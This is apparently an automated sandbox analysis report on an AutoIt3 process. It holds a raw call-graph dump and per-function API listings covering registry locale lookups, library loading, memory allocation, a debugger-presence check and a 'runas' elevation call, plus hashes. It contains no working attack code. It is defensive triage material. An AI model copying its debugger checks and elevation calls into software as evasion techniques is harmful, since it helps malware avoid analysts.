143698 80101b 143697->143698 143702 815f39 143697->143702 143698->143693 143703 815f42 143702->143703 143704 815cfb 143702->143704 143705 822f70 __cinit 67 API calls 143703->143705 143706 815d13 143704->143706 143705->143704 143707 811207 59 API calls 143706->143707 143708 815d2b GetVersionExW 143707->143708 143709 811821 59 API calls 143708->143709 143710 815d6e 143709->143710 143711 811981 59 API calls 143710->143711 143722 815d9b 143710->143722 143712 815d8f 143711->143712 143713 81133d 59 API calls 143712->143713 143713->143722 143714 815e00 GetCurrentProcess IsWow64Process 143715 815e19 143714->143715 143717 815e98 GetSystemInfo 143715->143717 143718 815e2f 143715->143718 143716 851098 143719 815e65 143717->143719 143730 8155f0 143718->143730 143719->143698 143722->143714 143722->143716 143723 815e41 143726 8155f0 2 API calls 143723->143726 143724 815e8c GetSystemInfo 143725 815e56 143724->143725 143725->143719 143728 815e5c FreeLibrary 143725->143728 143727 815e49 GetNativeSystemInfo 143726->143727 143727->143725 143728->143719 143731 815619 143730->143731 143732 8155f9 LoadLibraryA 143730->143732 143731->143723 143731->143724 143732->143731 143733 81560a GetProcAddress 143732->143733 143733->143731 143734 3d21944 143735 3d2194c 143734->143735 143735->143735 143953 3cc67f0 143735->143953 143738 3cc4440 7 API calls 143739 3d2197b 143738->143739 143957 3cf8af4 GetModuleHandleA 143739->143957 143954 3cc6801 143953->143954 144467 3cc40cc 143954->144467 143958 3cf8b24 LoadLibraryA 143957->143958 143959 3cf8b39 143958->143959 143960 3cf6aec 143959->143960 143961 3cf6af4 143960->143961 143961->143961 144498 3cf681c 143961->144498 144468 3cc40ff 144467->144468 144471 3cc405c 144468->144471 144472 3cc4071 144471->144472 144473 3cc40a7 144471->144473 144472->144473 144475 3cc5990 144472->144475 144473->143738 144476 3cc59bc 144475->144476 144477 3cc59a0 GetModuleFileNameA 144475->144477 144476->144472 144479 3cc5c24 GetModuleFileNameA RegOpenKeyExA 144477->144479 144480 3cc5ca6 144479->144480 144481 3cc5c66 RegOpenKeyExA 144479->144481 144497 3cc5a4c 6 API calls 144480->144497 144481->144480 144483 3cc5c84 RegOpenKeyExA 144481->144483 144483->144480 144485 3cc5d2f lstrcpyn GetThreadLocale GetLocaleInfoA 144483->144485 144484 3cc5ccb RegQueryValueExA 144486 3cc5d0d RegCloseKey 144484->144486 144487 3cc5ceb RegQueryValueExA 144484->144487 144488 3cc5e5f 144485->144488 144489 3cc5d66 144485->144489 144486->144476 144486->144485 144487->144486 144490 3cc5d09 144487->144490 144488->144476 144489->144488 144491 3cc5d76 lstrlen 144489->144491 144490->144486 144492 3cc5d8f 144491->144492 144492->144488 144493 3cc5dbd lstrcpyn LoadLibraryExA 144492->144493 144494 3cc5de9 144492->144494 144493->144494 144494->144488 144495 3cc5df3 lstrcpyn LoadLibraryExA 144494->144495 144495->144488 144496 3cc5e29 lstrcpyn LoadLibraryExA 144495->144496 144496->144488 144497->144484 144533 3cf5200 144498->144533 144500 3cf6834 144501 3cf6898 144500->144501 144502 3cf5200 8 API calls 144501->144502 144503 3cf68c3 144502->144503 144504 3cf68c8 144503->144504 144505 3cf68d3 144503->144505 144541 3cf4d48 144504->144541 144507 3cc4440 7 API calls 144505->144507 144508 3cf68d1 144507->144508 144537 3cc863c 144508->144537 144511 3cc4788 7 API calls 144512 3cf690b 144511->144512 144513 3cc43ec 7 API calls 144512->144513 144514 3cf6920 144513->144514 144515 3cf6a64 144514->144515 144516 3cf6a8f 144515->144516 144517 3cf6aa7 144516->144517 144518 3cf6ac3 144516->144518 144561 3cf4fc0 9 API calls 144517->144561 144519 3cc43ec 7 API calls 144518->144519 144523 3cf6ac1 144519->144523 144558 3cc4ab8 144523->144558 144524 3cc4788 144525 3cc4799 144524->144525 144526 3cc47bf 144525->144526 144527 3cc47d6 144525->144527 144529 3cc49f8 7 API calls 144526->144529 144528 3cc44b0 7 API calls 144527->144528 144530 3cc47cc 144528->144530 144529->144530 144531 3cc4807 144530->144531 144532 3cc4440 7 API calls 144530->144532 144532->144531 144534 3cc43ec 7 API calls 144533->144534 144536 3cf521d 144534->144536 144535 3cf528e RegCloseKey 144535->144500 144536->144535 144538 3cc8652 144537->144538 144550 3cc44dc 144538->144550 144542 3cf4db0 144541->144542 144548 3cf4d6c 144541->144548 144543 3cc4410 7 API calls 144542->144543 144544 3cf4dca 144543->144544 144544->144508 144545 3cf4da6 144546 3cc4440 7 API calls 144545->144546 144546->144542 144548->144545 144549 3cc46d0 7 API calls 144548->144549 144555 3cc45d4 144548->144555 144549->144548 144551 3cc44b0 7 API calls 144550->144551 144552 3cc44ec 144551->144552 144553 3cc43ec 7 API calls 144552->144553 144554 3cc4504 144553->144554 144554->144511 144556 3cc44dc 7 API calls 144555->144556 144557 3cc45e1 144556->144557 144557->144548 144559 3cc4acc 144558->144559 144560 3cc4abe SysFreeString 144558->144560 144559->144524 144560->144559 144561->144523 144906 83e438 144936 805ede Mailbox _memmove 144906->144936 144912 820fe6 59 API calls Mailbox 144937 805447 Mailbox 144912->144937 144913 8069fa 144919 811c9c 59 API calls 144913->144919 144914 811c9c 59 API calls 144914->144936 144917 83ea9a 144922 811c9c 59 API calls 144917->144922 144938 805569 Mailbox 144919->144938 144920 8069ff 144981 86a48d 89 API calls 4 library calls 144920->144981 144921 83e691 144973 86a48d 89 API calls 4 library calls 144921->144973 144922->144938 144925 811c9c 59 API calls 144925->144937 144926 811207 59 API calls 144926->144937 144927 83e6a0 144928 83eb67 144928->144938 144974 857aad 59 API calls 144928->144974 144929 822f70 67 API calls __cinit 144929->144937 144932 811a36 59 API calls 144932->144936 144933 857aad 59 API calls 144933->144937 144936->144914 144936->144932 144936->144937 144936->144938 144940 806abc 144936->144940 144944 820fe6 59 API calls Mailbox 144936->144944 144945 806a9b 144936->144945 144947 8053b0 317 API calls 144936->144947 144948 83eff9 144936->144948 144950 83f007 144936->144950 144952 83efeb 144936->144952 144953 857aad 59 API calls 144936->144953 144956 868cd0 144936->144956 144960 87e60c 144936->144960 144965 805190 59 API calls Mailbox 144936->144965 144966 80523c 59 API calls 144936->144966 144968 87c87c 85 API calls 2 library calls 144936->144968 144969 87c9c9 95 API calls Mailbox 144936->144969 144970 867f11 59 API calls Mailbox 144936->144970 144971 87c355 317 API calls Mailbox 144936->144971 144972 856cf1 59 API calls Mailbox 144936->144972 144937->144912 144937->144913 144937->144917 144937->144920 144937->144921 144937->144925 144937->144926 144937->144928 144937->144929 144937->144933 144937->144938 144941 83ef28 144937->144941 144943 805a1a 144937->144943 144963 807e50 317 API calls 2 library calls 144937->144963 144964 806e30 60 API calls Mailbox 144937->144964 144976 86a48d 89 API calls 4 library calls 144940->144976 144975 86a48d 89 API calls 4 library calls 144941->144975 144980 86a48d 89 API calls 4 library calls 144943->144980 144944->144936 144967 80a9de 317 API calls 144945->144967 144947->144936 144978 805190 59 API calls Mailbox 144948->144978 144979 86a48d 89 API calls 4 library calls 144950->144979 144952->144938 144977 856cf1 59 API calls Mailbox 144952->144977 144953->144936 144957 868cde 144956->144957 144958 868cd9 144956->144958 144957->144936 144982 867d6e 144958->144982 145005 87d1c6 144960->145005 144962 87e61c 144962->144936 144963->144937 144964->144937 144965->144936 144966->144936 144967->144940 144968->144936 144969->144936 144970->144936 144971->144936 144972->144936 144973->144927 144974->144938 144975->144943 144976->144952 144977->144938 144978->144952 144979->144952 144980->144938 144981->144938 144983 867ea5 144982->144983 144984 867d85 144982->144984 144983->144957 144985 867d9d 144984->144985 144987 867ddc 144984->144987 144989 867dc5 144984->144989 144985->144989 144996 867dad 144985->144996 144986 820fe6 Mailbox 59 API calls 144988 867dbb Mailbox _memmove 144986->144988 144990 867df9 144987->144990 144991 820fe6 Mailbox 59 API calls 144987->144991 144998 820fe6 Mailbox 59 API calls 144988->144998 144989->144986 144990->144988 144992 867e24 144990->144992 144993 867e32 144990->144993 144991->144990 144994 820fe6 Mailbox 59 API calls 144992->144994 144995 820fe6 Mailbox 59 API calls 144993->144995 144994->144988 144997 867e38 144995->144997 144999 820fe6 Mailbox 59 API calls 144996->144999 145003 867a26 59 API calls Mailbox 144997->145003 144998->144983 144999->144988 145001 867e44 145004 81402a 61 API calls Mailbox 145001->145004 145003->145001 145004->144988 145006 804d37 84 API calls 145005->145006 145007 87d203 145006->145007 145022 87d24a Mailbox 145007->145022 145043 87de8e 145007->145043 145009 87d4a2 145010 87d617 145009->145010 145014 87d4b0 145009->145014 145082 87dfb1 92 API calls Mailbox 145010->145082 145013 87d626 145013->145014 145016 87d632 145013->145016 145056 87d057 145014->145056 145015 804d37 84 API calls 145023 87d29b Mailbox 145015->145023 145016->145022 145021 87d4e9 145071 820e38 145021->145071 145022->144962 145023->145009 145023->145015 145023->145022 145075 86fc0d 59 API calls 2 library calls 145023->145075 145076 87d6c8 61 API calls 2 library calls 145023->145076 145026 87d503 145077 86a48d 89 API calls 4 library calls 145026->145077 145027 87d51c 145028 8047be 59 API calls 145027->145028 145030 87d528 145028->145030 145032 804540 59 API calls 145030->145032 145031 87d50e GetCurrentProcess TerminateProcess 145031->145027 145033 87d53e 145032->145033 145041 87d565 145033->145041 145078 804230 59 API calls Mailbox 145033->145078 145035 87d68d 145035->145022 145039 87d6a1 FreeLibrary 145035->145039 145036 87d554 145079 87dd32 107 API calls _free 145036->145079 145039->145022 145041->145035 145080 804230 59 API calls Mailbox 145041->145080 145081 80523c 59 API calls 145041->145081 145083 87dd32 107 API calls _free 145041->145083 145044 811aa4 59 API calls 145043->145044 145045 87dea9 CharLowerBuffW 145044->145045 145084 85f903 145045->145084 145049 811207 59 API calls 145050 87dee2 145049->145050 145091 811462 59 API calls 2 library calls 145050->145091 145052 87def9 145053 811981 59 API calls 145052->145053 145055 87df05 Mailbox 145053->145055 145054 87df41 Mailbox 145054->145023 145055->145054 145092 87d6c8 61 API calls 2 library calls 145055->145092 145057 87d072 145056->145057 145061 87d0c7 145056->145061 145058 820fe6 Mailbox 59 API calls 145057->145058 145059 87d094 145058->145059 145060 820fe6 Mailbox 59 API calls 145059->145060 145059->145061 145060->145059 145062 87e139 145061->145062 145063 87e362 Mailbox 145062->145063 145070 87e15c _strcat _wcscpy __NMSG_WRITE 145062->145070 145063->145021 145064 80502b 59 API calls 145064->145070 145065 8050d5 59 API calls 145065->145070 145066 805087 59 API calls 145066->145070 145067 82593c 58 API calls __crtLCMapStringA_stat 145067->145070 145068 804d37 84 API calls 145068->145070 145070->145063 145070->145064 145070->145065 145070->145066 145070->145067 145070->145068 145095 865e42 61 API calls 2 library calls 145070->145095 145073 820e4d 145071->145073 145072 820ee5 EnumWindows 145074 820eb3 145072->145074 145073->145072 145073->145074 145074->145026 145074->145027 145075->145023 145076->145023 145077->145031 145078->145036 145079->145041 145080->145041 145081->145041 145082->145013 145083->145041 145085 85f92e __NMSG_WRITE 145084->145085 145086 85f96d 145085->145086 145089 85f963 145085->145089 145090 85fa14 145085->145090 145086->145049 145086->145055 145089->145086 145093 8114db 61 API calls 145089->145093 145090->145086 145094 8114db 61 API calls 145090->145094 145091->145052 145092->145054 145093->145089 145094->145090 145095->145070 145096 11d0f41 145097 11d0f69 145096->145097 145098 11d0f56 145096->145098 145100 11d0f8a 145097->145100 145101 11d0f80 RtlEnterCriticalSection 145097->145101 145125 11d015d RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 145098->145125 145112 11d0d3d 13 API calls 145100->145112 145101->145100 145102 11d0f5b 145102->145097 145104 11d0f5f 145102->145104 145105 11d0f93 145109 11d0f97 145105->145109 145113 11d09b9 145105->145113 145107 11d0fef RtlLeaveCriticalSection 145108 11d0ff9 145107->145108 145109->145107 145109->145108 145110 11d0fa3 145110->145109 145126 11d0b65 9 API calls 145110->145126 145112->145105 145114 11d09cb 145113->145114 145115 11d09d4 145113->145115 145133 11d015d RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 145114->145133 145118 11d09fd RtlEnterCriticalSection 145115->145118 145119 11d0a07 145115->145119 145124 11d09dc 145115->145124 145117 11d09d0 145117->145115 145117->145124 145118->145119 145119->145124 145127 11d0871 145119->145127 145122 11d0b4a RtlLeaveCriticalSection 145123 11d0b54 145122->145123 145123->145110 145124->145110 145125->145102 145126->145109 145128 11d0888 145127->145128 145129 11d08c9 145128->145129 145132 11d08f0 145128->145132 145134 11d07d9 145128->145134 145129->145132 145139 11d0609 145129->145139 145132->145122 145132->145123 145133->145117 145143 11cfedd 145134->145143 145136 11d07e9 145137 11d07f6 145136->145137 145152 11d074d 9 API calls 145136->145152 145137->145128 145140 11d062e 145139->145140 145141 11d06a4 145139->145141 145140->145132 145141->145140 145168 11d054d 145141->145168 145146 11cfefb 145143->145146 145144 11cff09 145153 11cfd61 145144->145153 145146->145144 145149 11cff69 145146->145149 145150 11cff17 145146->145150 145157 11cfbbd 145146->145157 145165 11cfa71 LocalAlloc 145146->145165 145166 11cfc99 VirtualFree 145149->145166 145150->145136 145152->145137 145155 11cfdb4 145153->145155 145154 11cfe03 145154->145150 145155->145154 145156 11cfdea VirtualAlloc 145155->145156 145156->145154 145156->145155 145158 11cfbcc VirtualAlloc 145157->145158 145160 11cfc1c 145158->145160 145161 11cfbf9 145158->145161 145160->145146 145167 11cf9e1 LocalAlloc 145161->145167 145163 11cfc05 145163->145160 145164 11cfc09 VirtualFree 145163->145164 145164->145160 145165->145146 145166->145150 145167->145163 145169 11d0561 145168->145169 145170 11d05fd 145169->145170 145171 11d05af 145169->145171 145172 11d0599 145169->145172 145170->145140 145174 11d00c9 3 API calls 145171->145174 145181 11d00c9 145172->145181 145175 11d05ad 145174->145175 145175->145170 145191 11d040d 9 API calls 145175->145191 145177 11d05d0 145178 11d05f2 145177->145178 145192 11d046d 9 API calls 145177->145192 145193 11cfaf9 LocalAlloc 145178->145193 145182 11d00f3 145181->145182 145183 11d0150 145181->145183 145194 11cfe21 145182->145194 145183->145175 145187 11d0114 145188 11d012b 145187->145188 145199 11cfc99 VirtualFree 145187->145199 145188->145183 145200 11cfaf9 LocalAlloc 145188->145200 145191->145177 145192->145178 145193->145170 145196 11cfe72 145194->145196 145195 11cfed3 145198 11cfa71 LocalAlloc 145195->145198 145196->145195 145197 11cfea4 VirtualFree 145196->145197 145197->145196 145198->145187 145199->145188 145200->145183 145201 80107d 145206 812fc5 145201->145206 145203 80108c 145204 822f70 __cinit 67 API calls 145203->145204 145205 801096 145204->145205 145207 812fd5 __write_nolock 145206->145207 145208 811207 59 API calls 145207->145208 145209 81308b 145208->145209 145210 8200cf 61 API calls 145209->145210 145211 813094 145210->145211 145237 8208c1 145211->145237 145214 811900 59 API calls 145215 8130ad 145214->145215 145216 814c94 59 API calls 145215->145216 145217 8130bc 145216->145217 145218 811207 59 API calls 145217->145218 145219 8130c5 145218->145219 145220 8119e1 59 API calls 145219->145220 145221 8130ce RegOpenKeyExW 145220->145221 145222 8501a3 RegQueryValueExW 145221->145222 145226 8130f0 Mailbox 145221->145226 145223 850235 RegCloseKey 145222->145223 145224 8501c0 145222->145224 145223->145226 145235 850247 _wcscat Mailbox __NMSG_WRITE 145223->145235 145225 820fe6 Mailbox 59 API calls 145224->145225 145227 8501d9 145225->145227 145226->145203 145228 81433f 59 API calls 145227->145228 145229 8501e4 RegQueryValueExW 145228->145229 145230 850201 145229->145230 145232 85021b 145229->145232 145231 811821 59 API calls 145230->145231 145231->145232 145232->145223 145233 811a36 59 API calls 145233->145235 145234 814c94 59 API calls 145234->145235 145235->145226 145235->145233 145235->145234 145236 811609 59 API calls 145235->145236 145236->145235 145238 831b70 __write_nolock 145237->145238 145239 8208ce GetFullPathNameW 145238->145239 145240 8208f0 145239->145240 145241 811821 59 API calls 145240->145241 145242 81309f 145241->145242 145242->145214

                                      Executed Functions

                                      Function 03CC5C24 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1118 3cc5c24-3cc5c64 GetModuleFileNameA RegOpenKeyExA 1119 3cc5ca6-3cc5ce9 call 3cc5a4c RegQueryValueExA 1118->1119 1120 3cc5c66-3cc5c82 RegOpenKeyExA 1118->1120 1125 3cc5d0d-3cc5d27 RegCloseKey 1119->1125 1126 3cc5ceb-3cc5d07 RegQueryValueExA 1119->1126 1120->1119 1122 3cc5c84-3cc5ca0 RegOpenKeyExA 1120->1122 1122->1119 1124 3cc5d2f-3cc5d60 lstrcpyn GetThreadLocale GetLocaleInfoA 1122->1124 1127 3cc5e5f-3cc5e65 1124->1127 1128 3cc5d66-3cc5d6a 1124->1128 1125->1124 1126->1125 1129 3cc5d09 1126->1129 1130 3cc5d6c-3cc5d70 1128->1130 1131 3cc5d76-3cc5d8d lstrlen 1128->1131 1129->1125 1130->1127 1130->1131 1132 3cc5d92-3cc5d98 1131->1132 1133 3cc5d9a-3cc5da3 1132->1133 1134 3cc5da5-3cc5dae 1132->1134 1133->1134 1135 3cc5d8f 1133->1135 1134->1127 1136 3cc5db4-3cc5dbb 1134->1136 1135->1132 1137 3cc5dbd-3cc5de7 lstrcpyn LoadLibraryExA 1136->1137 1138 3cc5de9-3cc5deb 1136->1138 1137->1138 1138->1127 1139 3cc5ded-3cc5df1 1138->1139 1139->1127 1140 3cc5df3-3cc5e27 lstrcpyn LoadLibraryExA 1139->1140 1140->1127 1141 3cc5e29-3cc5e5d lstrcpyn LoadLibraryExA 1140->1141 1141->1127
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03CC5C3F
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C5D
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C7B
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03CC5C99
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03CC5CE2
                                      • RegQueryValueExA.ADVAPI32(?,03CC5EA4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001), ref: 03CC5D00
                                      • RegCloseKey.ADVAPI32(?,03CC5D2F,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5D22
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03CC5D3F
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 03CC5D4C
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 03CC5D52
                                      • lstrlen.KERNEL32(00000000), ref: 03CC5D7D
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5DD2
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5DE2
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5E0E
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E1E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E48
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: e27a9c02b07d020971cf0dc1afbb756df3a1894eba60258a5acc9fc19b392a2b
                                      • Instruction ID: 419cad0a7ccc4a19e229d74b2b47cc19d7c248578446b4826cfd77fc2eb4215e
                                      • Opcode Fuzzy Hash: e27a9c02b07d020971cf0dc1afbb756df3a1894eba60258a5acc9fc19b392a2b
                                      • Instruction Fuzzy Hash: 16618279E1438D7EEB10DAE5CC45FEFB7BC9B49700F4440A9E604EA182D6B8EA44CB50
                                      Function 011D3111 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1094 11d3111-11d3151 GetModuleFileNameA RegOpenKeyExA 1095 11d3193-11d31d6 call 11d2f39 RegQueryValueExA 1094->1095 1096 11d3153-11d316f RegOpenKeyExA 1094->1096 1101 11d31d8-11d31f4 RegQueryValueExA 1095->1101 1102 11d31fa-11d3214 RegCloseKey 1095->1102 1096->1095 1097 11d3171-11d318d RegOpenKeyExA 1096->1097 1097->1095 1099 11d321c-11d324d lstrcpyn GetThreadLocale GetLocaleInfoA 1097->1099 1103 11d334c-11d3352 1099->1103 1104 11d3253-11d3257 1099->1104 1101->1102 1105 11d31f6 1101->1105 1106 11d3259-11d325d 1104->1106 1107 11d3263-11d327a lstrlen 1104->1107 1105->1102 1106->1103 1106->1107 1108 11d327f-11d3285 1107->1108 1109 11d3287-11d3290 1108->1109 1110 11d3292-11d329b 1108->1110 1109->1110 1112 11d327c 1109->1112 1110->1103 1111 11d32a1-11d32a8 1110->1111 1113 11d32aa-11d32d4 lstrcpyn LoadLibraryExA 1111->1113 1114 11d32d6-11d32d8 1111->1114 1112->1108 1113->1114 1114->1103 1115 11d32da-11d32de 1114->1115 1115->1103 1116 11d32e0-11d3314 lstrcpyn LoadLibraryExA 1115->1116 1116->1103 1117 11d3316-11d334a lstrcpyn LoadLibraryExA 1116->1117 1117->1103
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 011D312C
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D314A
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D3168
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 011D3186
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 011D31CF
                                      • RegQueryValueExA.ADVAPI32(?,011D3391,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001), ref: 011D31ED
                                      • RegCloseKey.ADVAPI32(?,011D321C,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D320F
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 011D322C
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 011D3239
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 011D323F
                                      • lstrlen.KERNEL32(00000000), ref: 011D326A
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32BF
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D32CF
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32FB
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D330B
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3335
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3345
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: 136ee96dba67357bf197ec0ef800fecb354f612b2ded54c2211a37fccea617c9
                                      • Instruction ID: f5aee3ebe7e2bf9c7a92d30571b1f91ad7796afeae27d08d22930b2227fcaaa5
                                      • Opcode Fuzzy Hash: 136ee96dba67357bf197ec0ef800fecb354f612b2ded54c2211a37fccea617c9
                                      • Instruction Fuzzy Hash: F36196B1E0421E7EEB19DAE8CC85FEF77BDBB18704F0040A5A614E6181DBB4DA45CB61
                                      Function 00815240 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 147windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081526C
                                      • IsDebuggerPresent.KERNEL32 ref: 0081527E
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008152E6
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                        • Part of subcall function 0080BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0080BC07
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00815366
                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00850B2E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00850B66
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008B6D10), ref: 00850BE9
                                      • ShellExecuteW.SHELL32(00000000), ref: 00850BF0
                                        • Part of subcall function 0081514C: GetSysColorBrush.USER32(0000000F), ref: 00815156
                                        • Part of subcall function 0081514C: LoadCursorW.USER32(00000000,00007F00), ref: 00815165
                                        • Part of subcall function 0081514C: LoadIconW.USER32(00000063), ref: 0081517C
                                        • Part of subcall function 0081514C: LoadIconW.USER32(000000A4), ref: 0081518E
                                        • Part of subcall function 0081514C: LoadIconW.USER32(000000A2), ref: 008151A0
                                        • Part of subcall function 0081514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008151C6
                                        • Part of subcall function 0081514C: RegisterClassExW.USER32(?), ref: 0081521C
                                        • Part of subcall function 008150DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00815109
                                        • Part of subcall function 008150DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0081512A
                                        • Part of subcall function 008150DB: ShowWindow.USER32(00000000), ref: 0081513E
                                        • Part of subcall function 008150DB: ShowWindow.USER32(00000000), ref: 00815147
                                        • Part of subcall function 008159D3: _memset.LIBCMT ref: 008159F9
                                        • Part of subcall function 008159D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00815A9E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: (m$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                      • API String ID: 529118366-1511201690
                                      • Opcode ID: 4160a9d561f2c936a48976a2878befa4f6040f098dec3e3b26b6f3958065a43d
